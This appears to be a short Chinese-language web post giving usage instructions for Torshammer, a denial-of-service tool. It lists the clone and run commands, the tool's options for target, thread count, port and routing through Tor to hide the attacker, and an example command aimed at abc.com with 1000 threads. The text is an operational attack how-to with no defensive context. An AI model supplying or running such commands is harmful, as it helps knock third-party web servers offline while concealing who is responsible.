git clone https://github.com/dotfighter/torshammer.git
cd torshammer
python torshammer.py 这里支持python2
后面需要加的参数
-t|--target <Hostname|IP>
-r|--threads <Number of threads> Defaults to 256
-p|--port <Web Server Port> Defaults to 80
-T|--tor Enable anonymising through tor on 127.0.0.1:9050 定制攻击
-h|--help Shows this help
python torshammer.py -t abc.com -r 1000 -p 80
网友评论